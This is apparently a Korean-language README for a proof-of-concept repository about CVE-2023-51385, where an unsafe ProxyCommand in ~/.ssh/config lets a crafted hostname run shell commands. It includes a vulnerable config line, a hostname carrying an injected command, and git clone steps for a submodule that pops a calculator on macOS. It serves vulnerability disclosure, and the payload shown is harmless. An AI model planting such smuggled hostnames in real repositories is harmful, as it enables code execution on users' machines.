
CVE-2023-51385
안전하지 않은 ~/.ssh/config를 통한 RCE SSH.ProxyCommand에서 터널 및 연결 프록시를 위해 %h, %p와 같은 토큰을 사용하는 것은 꽤 일반적입니다.
취약한 설정 host *.example.com ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p 참고: 처음 평가에서는 '%h`(단일 인용부호)를 사용하면 이를 피할 수 있을 것이라고 생각했지만, 다음과 같은 것으로는 여전히 취약한 것 같습니다:
ssh://echo helloworld > cve.txt`foo.example.com/bar
출처: https://man.openbsd.org/ssh_config#ProxyCommand
이 저장소의 내용 이 취약점을 악용하여 OSX에서 계산기를 띄우는 서브모듈입니다.
다음과 같이 직접 사용해 보세요:
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
또는
git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules